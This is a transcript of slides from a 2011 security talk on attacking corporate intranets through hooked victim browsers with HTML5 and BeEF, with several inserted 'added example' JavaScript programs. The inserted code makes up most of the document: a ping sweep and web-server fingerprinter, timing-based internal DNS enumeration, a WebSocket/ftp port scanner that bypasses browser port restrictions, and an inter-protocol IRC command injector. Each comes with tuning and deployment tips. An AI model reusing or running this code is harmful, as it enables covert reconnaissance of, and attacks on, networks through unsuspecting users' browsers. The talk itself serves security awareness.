8/2/2019 Pawning Intranets HTML5
Pwning Intranets with HTML5
Javier Marcos de Prado
Juan Galiana Lara
HashDays Security & Risk Conference 2011. 2011 IBM Corporation.
Agenda
How does our attack work?
How do we discover what is in your network?
What does your infrastructure tell us for free?
Diagrams your administrator wants and we now have
Inter-protocol communication
Demo
Conclusions
References and Links
How does our attack work?
Attack vector
How do we discover what is in your network?
Why would you use HTML5?
HTML5 ~= HTML + JS + CSS
Backwards compatibility with HTML4
New tags in, old tags out
JavaScript APIs
Canvas, WebGL, geolocation, native media support
Cross-Domain communication
You will have to, eventually
Why would we use HTML5?
HTML5 ~= HTML + JS + CSS
WebSockets
CORS
WebWorkers
JavaScript APIs
What is BeEF?
BeEF: Browser Exploitation Framework
Released to the public by Wade Alcorn in 2005
Powerful tool to squeeze the most out of XSS attacks: it takes over the client (victim) browser and provides a complete C&C
Different modules to attack in real time: OS/browser/plugin information, open sessions, visited links, custom JS...
Great to scare people who think that XSS is just a popup!
HTML5 + BeEF
The attack can be triggered by:
Spotting a victim with access to the intranet
Tricking the victim into visiting a malicious website
Following a link: URL shorteners, Twitter, Facebook...
Phishing
Cross-Site Scripting
BeEF acts as Command & Control for the hooked victims
Our HTML5 code runs in the victim's browser through BeEF
What does your infrastructure tell us for free?
Using a technique known as footprinting, we want to...
Locate the network range
Identify active machines
Unearth internal hostnames
Discover open ports
Detect operating systems
Uncover services on ports
Map the network
Toolkit: Modules in BeEF
Control panel to manage hooked browsers
Comes out of the box with a set of modules
You can develop and add your own module!
Toolkit: Add your own module
Discover Internal Network
Get Network Settings
Gets the local IP address of the hooked browser
Reveals the internal network the victim is connected to
Ping
Discover internal addresses
Ping in JS without user interaction
Ping sweep
Discover active machines in the intranet or adjacent networks
Ping over a Class C (/24) network
Iterates over the whole IP range of the network
Example: 192.168.1.1-192.168.1.254
Intranet footprinting
Discover web servers on ports 80 and 8080
Scans for Apache, IIS... and known routers and printers
It works by trying to load known image resources and handling the onload event
What if there is an interesting host at intranet.company.com (10.126.209.198)?
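The ping sweep from the previous slides and the image-based footprinting above, as one added example; it is not code from the talk or from BeEF's modules. Assumptions, not values from the slides: the /24 base 192.168.1 (in practice it would come from the Get Network Settings result), a 1.5 s timeout, and the short table of default-install image paths in KNOWN_IMAGES.

```javascript
// Added example (not BeEF's module code): host discovery and web-server
// fingerprinting from a hooked browser, driven by <img> loads and timing.
// The only browser-specific function is loadImage(); the rest is pure logic.

// Expand a /24 base such as "192.168.1" into 192.168.1.1 ... 192.168.1.254.
function ipRange(base, first = 1, last = 254) {
  const hosts = [];
  for (let i = first; i <= last; i++) hosts.push(`${base}.${i}`);
  return hosts;
}

// Load one image URL and report how the browser reacted and how long it took.
// Resolves with { state: 'load' | 'error' | 'timeout', ms }; never rejects.
function loadImage(url, timeoutMs) {
  return new Promise((resolve) => {
    const start = Date.now();
    const img = new Image();
    let timer;
    let done = false;
    const finish = (state) => {
      if (done) return;
      done = true;
      clearTimeout(timer);
      img.onload = img.onerror = null;
      img.src = ''; // abort any load still in flight
      resolve({ state, ms: Date.now() - start });
    };
    timer = setTimeout(() => finish('timeout'), timeoutMs);
    img.onload = () => finish('load');
    img.onerror = () => finish('error');
    img.src = url;
  });
}

// A host that is up completes the TCP handshake (then serves an image, an HTTP
// error page, or just answers RST) and fires load/error quickly. An address
// that is absent or silently filtered only ever times out.
function isAlive(result) {
  return result.state !== 'timeout';
}

// Probe every host with bounded concurrency; returns the alive IPs in input
// order. `probe(url)` must resolve to a loadImage()-style result.
async function pingSweep(hosts, probe, concurrency = 16) {
  const results = new Array(hosts.length);
  let next = 0;
  async function worker() {
    while (next < hosts.length) {
      const i = next++;
      results[i] = await probe(`http://${hosts[i]}/`);
    }
  }
  await Promise.all(Array.from({ length: concurrency }, worker));
  return hosts.filter((_, i) => isAlive(results[i]));
}

// Static images that default installations serve. Assumed, illustrative
// paths (not BeEF's signature list); extend with what your estate exposes.
const KNOWN_IMAGES = [
  { name: 'Apache httpd', path: '/icons/apache_pb.gif' },
  { name: 'Apache Tomcat', path: '/tomcat.gif' },
  { name: 'Microsoft IIS 7', path: '/welcome.png' },
  { name: 'Microsoft IIS 6', path: '/pagerror.gif' },
];

// onload means the host served exactly that image: strong evidence of the
// product. onerror only means "not that image" (404, HTML, refused), so a
// miss is not evidence of absence.
async function fingerprintHost(ip, ports, probe) {
  const found = [];
  for (const port of ports) {
    for (const sig of KNOWN_IMAGES) {
      const r = await probe(`http://${ip}:${port}${sig.path}`);
      if (r.state === 'load') found.push({ port, name: sig.name });
    }
  }
  return found;
}

// Browser entry point. The /24 base would come from BeEF's Get Network
// Settings module; "192.168.1" is a placeholder. Skipped outside a browser.
if (typeof window !== 'undefined') {
  const probe = (url) => loadImage(url, 1500);
  pingSweep(ipRange('192.168.1'), probe).then(async (alive) => {
    for (const ip of alive) {
      const hits = await fingerprintHost(ip, [80, 8080], probe);
      console.log(ip, hits.length ? hits : 'up, no known web server');
    }
  });
}
```

isAlive() counts any load or error that arrives before the timeout as a live host, because even a refused connection needs a host on the wire to send the RST; the timeout value is the knob to tune for a slow or wireless segment. The fingerprint table is deliberately small: a real run carries dozens of product-specific image paths, and a hit on one is a lead to verify with the port scanner, not proof of a version.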
DNS enumeration
Discover internal hostnames
The most important servers normally have a DNS name associated with their IP address
If we type intranet into a web browser, the browser will try to resolve intranet.company.com (the system's DNS search suffix is appended)
DNS enumeration
We cannot resolve DNS directly from JavaScript
But we can make cross-domain requests with Cross-Origin Resource Sharing (CORS) and WebSockets
Hostnames are extracted with a dictionary and timing attacks: a request to a name that resolves fails differently, and later, than one to a name that does not
TODO: run multiple threads in parallel with WebWorkers
Jump to adjacent networks; common hostnames are intranet, ftp, webmail...
DNS enumeration
Using a dictionary of possible subdomains it is possible to discover internal hostnames
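The timing-based dictionary enumeration described on the DNS enumeration slides, as an added example; it is not BeEF's DNS module or code from the talk. Assumptions: the internal suffix company.com taken from the slide, a ten-word dictionary, a 3 s request timeout, and the factor/floor thresholds in looksResolved(), all chosen for illustration.

```javascript
// Added example (not BeEF's module): dictionary-based discovery of internal
// hostnames from the browser. JavaScript cannot resolve names itself, but the
// time a cross-origin request takes to fail leaks whether the name resolved:
// NXDOMAIN fails almost at once, while a resolvable name makes the browser open
// a TCP connection first and only then hit CORS, a refused port or a timeout.
// xhrProbe() is the browser-specific part; everything else is pure.

const DEFAULT_WORDLIST = ['intranet', 'ftp', 'webmail', 'mail', 'wiki', 'vpn',
  'git', 'jira', 'nas', 'printer'];

// Fully qualified candidates for one internal suffix.
function candidates(domain, words = DEFAULT_WORDLIST) {
  return words.map((w) => `${w}.${domain}`);
}

// A label that certainly does not exist, for measuring the NXDOMAIN baseline.
function randomLabel() {
  return 'nx' + Math.random().toString(36).slice(2, 12);
}

function median(values) {
  const s = [...values].sort((a, b) => a - b);
  const mid = Math.floor(s.length / 2);
  return s.length % 2 ? s[mid] : (s[mid - 1] + s[mid]) / 2;
}

// Time a cross-origin GET until it ends for any reason (load, error, abort and
// timeout all fire loadend). Resolves with elapsed milliseconds; never rejects.
function xhrProbe(host, timeoutMs) {
  return new Promise((resolve) => {
    const start = Date.now();
    const xhr = new XMLHttpRequest();
    xhr.timeout = timeoutMs;
    xhr.onloadend = () => resolve(Date.now() - start);
    xhr.open('GET', `http://${host}/`, true);
    xhr.send();
  });
}

// Heuristic: a failure that takes clearly longer than the NXDOMAIN baseline
// means the name resolved. `factor` and `floorMs` absorb resolver jitter and
// need calibrating per network; treat hits as leads, not proof.
function looksResolved(ms, baselineMs, factor = 3, floorMs = 20) {
  return ms > Math.max(baselineMs * factor, floorMs);
}

// Baseline from a few guaranteed-nonexistent names, then test each candidate.
// Sequential on purpose so one request's timing does not disturb the next;
// the talk's TODO of parallelising with WebWorkers trades accuracy for speed.
async function enumerateHosts(domain, probe, words = DEFAULT_WORDLIST) {
  const samples = [];
  for (let i = 0; i < 3; i++) samples.push(await probe(`${randomLabel()}.${domain}`));
  const baseline = median(samples);
  const found = [];
  for (const host of candidates(domain, words)) {
    const ms = await probe(host);
    if (looksResolved(ms, baseline)) found.push({ host, ms });
  }
  return { baseline, found };
}

// Browser entry point; company.com is the suffix from the slide, assumed to be
// the victim's internal domain. Skipped outside a browser.
if (typeof window !== 'undefined') {
  enumerateHosts('company.com', (h) => xhrProbe(h, 3000))
    .then((r) => console.log('baseline', r.baseline, 'ms; found', r.found));
}
```

Run it from a hook page served over plain http: from an https origin the browser blocks these http requests as mixed content before any timing can be measured. The baseline is re-measured on every run because resolver latency differs per network, and a hit only says the name resolves somewhere, so confirm it with the footprinting probes before putting it on the map.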
Port Scanning
Analogy: figure out what a building does by looking at the door
Best-known port scanner: Nmap
What information can I extract from port scanning?
Basic OS fingerprinting
Service probing
Filtered ports sometimes appear as open
Filtered port -> firewall -> juicy stuff behind it!
INFORMATION, INFORMATION, INFORMATION
Port Scanning
Most intranets are not filtered: FUN!
Finding services to kick off an APT
Basic port scanning: OPEN or CLOSED?
Classic approach: img/iframe src + JavaScript
HTML5 approach: CORS and WebSockets + JavaScript
Problems? Firefox, WebSockets and CORS refuse connections to well-known ports
Solution! Use a different protocol: ftp still rocks
Similar to a basic TCP connect scan with nmap:
Example: nmap -sT hostname -p PORT
Port Scanning: Beating protections
Blocking example for known ports (Firefox, WebSockets and CORS): http://example.com:22 is refused by the browser
Workaround! ftp://example.com:22
It works on Internet Explorer, Mozilla Firefox, Google Chrome and Safari
Based on timeouts, which can be configured
Port Scanning module
Scans can be performed using ranges, lists or single ports
Uses a mixed method to work around security measures: blocked ports can still be scanned!
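A port scanner along the lines of the three port-scanning slides above, as an added example rather than BeEF's module code. Assumptions: Firefox's restricted-port list as it stood around 2011, a 100 ms RST threshold that calibrateThreshold() refines per host, the host 10.126.209.198 from an earlier slide, and the port list 21,22,80,443,8080. Two caveats for anyone trying this today: Chrome 95 and Firefox 90 removed ftp:// support entirely, so the restricted-port workaround only exists in browsers of the talk's era, and a ws:// connection from an https page is blocked as mixed content.

```javascript
// Added example (not BeEF's port scanner): TCP port state inferred from the
// browser using WebSockets and timing. new WebSocket('ws://host:port') makes
// the browser complete a TCP handshake; a closed port answers RST and the
// socket errors within milliseconds, while an open port running a non-WebSocket
// service errors later or holds the connection until our timer fires.

// Firefox's restricted ports around the time of the talk (assumed to be
// representative; Chrome's list differs slightly, check the target browser).
const RESTRICTED_PORTS = new Set([1, 7, 9, 11, 13, 15, 17, 19, 20, 21, 22, 23,
  25, 37, 42, 43, 53, 77, 79, 87, 95, 101, 102, 103, 104, 109, 110, 111, 113,
  115, 117, 119, 123, 135, 139, 143, 179, 389, 465, 512, 513, 514, 515, 526,
  530, 531, 532, 540, 556, 563, 587, 601, 636, 993, 995, 2049, 4045, 6000]);

// "22,80,8000-8003" -> [22, 80, 8000, 8001, 8002, 8003]: ranges, lists, singles.
function parsePorts(spec) {
  const ports = [];
  for (const part of spec.split(',')) {
    const [lo, hi = lo] = part.trim().split('-').map(Number);
    for (let p = lo; p <= hi; p++) ports.push(p);
  }
  return ports;
}

// ws:// for ports the browser is willing to connect to; ftp:// (loaded via an
// <img> or <iframe>, as on the slides) for restricted ones, where the
// WebSocket constructor throws before any packet is sent.
function probeUrl(host, port) {
  return RESTRICTED_PORTS.has(port) ? `ftp://${host}:${port}/` : `ws://${host}:${port}/`;
}

// WebSocket probe. Resolves { state: 'open' | 'error' | 'timeout' | 'blocked', ms }.
function wsProbe(host, port, timeoutMs) {
  return new Promise((resolve) => {
    const start = Date.now();
    let ws;
    try {
      ws = new WebSocket(`ws://${host}:${port}/`);
    } catch (e) {
      resolve({ state: 'blocked', ms: 0 }); // restricted port: use the ftp:// loader
      return;
    }
    let timer;
    let done = false;
    const finish = (state) => {
      if (done) return;
      done = true;
      clearTimeout(timer);
      ws.onopen = ws.onerror = ws.onclose = null;
      ws.close();
      resolve({ state, ms: Date.now() - start });
    };
    timer = setTimeout(() => finish('timeout'), timeoutMs);
    ws.onopen = () => finish('open');
    ws.onerror = () => finish('error');
    ws.onclose = () => finish('error');
  });
}

// Map a probe result to a port state. Anything the browser could not settle
// quickly counts as open; a silently filtered port lands there too, which is
// the "filtered ports sometimes appear as open" effect from the slides.
function classifyPort(result, rstThresholdMs) {
  if (result.state === 'blocked') return 'blocked';
  if (result.state === 'error' && result.ms < rstThresholdMs) return 'closed';
  return 'open';
}

// Measure how fast this host sends RST by probing a high port assumed closed,
// then set the threshold well above that. Calibrate per host and browser.
async function calibrateThreshold(host, probe, samples = 3) {
  const times = [];
  for (let i = 0; i < samples; i++) {
    const port = 40000 + Math.floor(Math.random() * 20000);
    times.push((await probe(host, port)).ms);
  }
  const sorted = times.sort((a, b) => a - b);
  return Math.max(3 * sorted[Math.floor(sorted.length / 2)], 30);
}

// Scan sequentially so one probe's timing does not skew the next.
async function scanPorts(host, ports, probe, rstThresholdMs = 100) {
  const out = [];
  for (const port of ports) {
    out.push({ port, state: classifyPort(await probe(host, port), rstThresholdMs) });
  }
  return out;
}

// Browser entry point; the host is from an earlier slide, the port list is
// assumed. Skipped outside a browser.
if (typeof window !== 'undefined') {
  const probe = (h, p) => wsProbe(h, p, 2000);
  calibrateThreshold('10.126.209.198', probe)
    .then((t) => scanPorts('10.126.209.198', parsePorts('21,22,80,443,8080'), probe, t))
    .then((result) => console.log(result));
}
```

The browser only exposes whether and when the socket failed, so "open" here covers a real service that keeps the connection up, an HTTP server that answered the upgrade with an error, and a port a firewall silently drops; telling those apart needs the image-based footprinting or a second probe type. Calibrating the RST threshold against a port known to be closed is what makes the classification usable on a given network; the ftp:// loader for restricted ports is injected through `probe`, since the WebSocket constructor refuses them outright.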
Diagrams your administrator wants
Network Topology
All the previous techniques have succeeded and the pwnage is close...
What to do now? Show the results!
All the information gathered so far, displayed in a nice format
Simple OS fingerprinting performed
Looks great on reports...
Network Topology
Inter-protocol communication
Inter-protocol
Launch requests from a web browser to non-HTTP services
How? Playing with 'POST' forms
Using the multipart/form-data encoding type
Services ignore lines they do not understand, like the HTTP headers, but execute the commands they do understand
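The multipart POST trick, applied to IRC as on the next slide, as an added example; it is not the talk's demo code. multipart/form-data is the encoding that matters here because a textarea's line breaks reach the wire as CR LF inside the body, whereas a urlencoded form would turn them into %0D%0A that the service cannot parse. Assumptions: the internal host 10.126.209.198 from an earlier slide, a listener on port 10667 (the standard IRC ports 6665-6669 are on the browsers' restricted-port lists), the nick, channel and message, and the boundary string renderRequest() uses to show the bytes the service receives.

```javascript
// Added example (not the talk's demo code): inter-protocol communication by
// POSTing a multipart form at an IRC server. The server reads the request one
// line at a time, rejects what it does not understand (request line, HTTP
// headers, multipart boundary) and executes the lines that parse as commands.
// submitForm() is the browser-specific part; the builders are pure.

// IRC commands, one per line, CRLF-terminated as the protocol requires.
function buildIrcCommands(nick, channel, message) {
  return [
    `NICK ${nick}`,
    `USER ${nick} 8 * :${nick}`,
    `JOIN ${channel}`,
    `PRIVMSG ${channel} :${message}`,
    'QUIT :done',
  ].join('\r\n') + '\r\n';
}

// Roughly what reaches the socket (constructed rendering; a real browser adds
// User-Agent, Origin, Accept and similar headers, which the IRC server also
// rejects as unknown commands).
function renderRequest(host, port, fieldName, value, boundary = 'beefboundary') {
  const body = [
    `--${boundary}`,
    `Content-Disposition: form-data; name="${fieldName}"`,
    '',
    value.replace(/\r\n$/, ''),
    `--${boundary}--`,
    '',
  ].join('\r\n');
  const length = new TextEncoder().encode(body).length;
  return [
    'POST / HTTP/1.1',
    `Host: ${host}:${port}`,
    `Content-Type: multipart/form-data; boundary=${boundary}`,
    `Content-Length: ${length}`,
    '',
    body,
  ].join('\r\n');
}

// Lines of a rendered request that an IRC server would act on. Handy for
// checking that a payload survives the HTTP framing before firing it.
function ircLines(request) {
  const verbs = new Set(['NICK', 'USER', 'JOIN', 'PRIVMSG', 'QUIT']);
  return request.split('\r\n').filter((line) => verbs.has(line.split(' ')[0]));
}

// Browser side: hidden multipart form submitted into a hidden iframe so the
// hooked page does not navigate away. `port` must be one the browser allows.
function submitForm(host, port, fieldName, value) {
  const sink = document.createElement('iframe');
  sink.name = 'ipc_sink';
  sink.style.display = 'none';
  const form = document.createElement('form');
  form.method = 'POST';
  form.enctype = 'multipart/form-data';
  form.action = `http://${host}:${port}/`;
  form.target = sink.name;
  const field = document.createElement('textarea');
  field.name = fieldName;
  field.value = value;
  form.appendChild(field);
  document.body.appendChild(sink);
  document.body.appendChild(form);
  form.submit();
}

// Entry point when loaded in a browser; the host is from an earlier slide, the
// port and IRC details are assumed. Skipped outside a browser.
if (typeof document !== 'undefined') {
  submitForm('10.126.209.198', 10667, 'cmd',
    buildIrcCommands('beefbot', '#ops', 'hello from the intranet'));
}
```

The browser will report the response as an error, since what comes back is not HTTP, but by then the IRC server has already processed every line it understood. Check ircLines(renderRequest(...)) before a live run: if the field value loses its CR LF pairs (for example because the form was switched to application/x-www-form-urlencoded) the whole payload collapses into one unparseable line and nothing executes.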
Inter-protocol: IRC
Inter-protocol: exploitation
Exploit vulnerabilities within the internal network to gain control
Force the victim's browser to send a request to the internal host
The vulnerability triggers and executes the shellcode
The shellcode launches a bind shell or back-connect shell to gain full control of the remote machine
Inter-protocol: exploitation
Demo
Conclusions
An attacker could get information from your network
And could also exploit and communicate with hosts on the network
Use the NoScript plugin for Firefox in order to protect yourself!
Users are exposed to HTML5 feature abuse each time they visit a website
Browsers should block this kind of request by default
References and Links
OWASP
http://www.owasp.org
BeEF: Browser Exploitation Framework
http://beefproject.com
Any query? Give us a shout!
@jgaliana @javutin
Thanks!